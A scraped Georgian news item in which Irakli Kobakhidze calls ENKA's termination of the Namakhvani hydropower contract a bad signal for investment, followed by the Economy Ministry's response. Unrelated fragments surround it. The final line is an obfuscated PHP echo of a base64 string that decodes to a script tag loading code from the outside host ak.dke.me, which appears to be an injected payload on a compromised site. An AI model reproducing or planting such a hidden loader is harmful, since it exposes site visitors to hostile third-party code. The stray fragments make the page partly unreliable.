celsiusi
ავერსი შნაიდერი
ეს არის ცუდი სიგნალი შემდგომი ინვესტიციებისთვის, თუმცა, საქართველოს ხელისუფლება ყველაფერს გააკეთებს, რომ კონკრეტულად ენერგეტიკის მიმართულებით დიდი ინვესტიციები ჩაიდოს, - ასე აფაშებს “ქართული ოცნების” თავმჯდომარე ირაკლი კობახიძე “ნამახვანჰესის” მშენებლობაზე კონტრაქტის შეწყვეტასთან დაკავშირებით ENKA-ს გადაწყვეტილებას.
 
“რა თქმა უნდა, ეს ყველა შემთხვევაში იყო კომპანიის მიერ გადადგმული ნაბიჯი. ენერგეტიკული დამოუკიდებლობის უზრუნველყოფა ჩვენთვის არის ერთ-ერთი მთავარი პრიორიტეტი არა მხოლოდ ეკონომიკური, არამედ პოლიტიკური და უსაფრთხოების თვალსაზრისითაც.
 
აქედან გამომდინარე, ეს არის ცუდი სიგნალი შემდგომი ინვესტიციებისთვის, თუმცა, საქართველოს ხელისუფლება ყველაფერს გააკეთებს, რომ კონკრეტულად ენერგეტიკის მიმართულებით დიდი ინვესტიციები ჩაიდოს. მთავრობას აქვს 10-წლიანი სამქომედო გეგმა, მათ შორის, ენერგეტიკის მიმართულებით და მილიარდობით დოლარის ინვესტიციების მოზიდვა არის დაგეგმილი ამ სფეროში“, – განაცხადა ირაკლი კობახიძემ.
 
შეგახსენებთ, რომ კომპანია ENKA-მ, რომელიც რიონის ხეობაში ნამახვანჰესს აშენებდა, საქართველოს ეკონომიკის სამინისტროსთან ხელშეკრულება გაწყვიტა.
 
აღნიშნულს ეკონომიკის სამინისტრო გამოეხმაურა და აღნიშნავს, რომ გაგრძელდება კომუნიკაცია ინვესტორ კომპანია ENKA-თან, რათა სწორი და სახელმწიფოებრივად გამართლებული გადაწყვეტილება გამოინახოს ​
1015
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");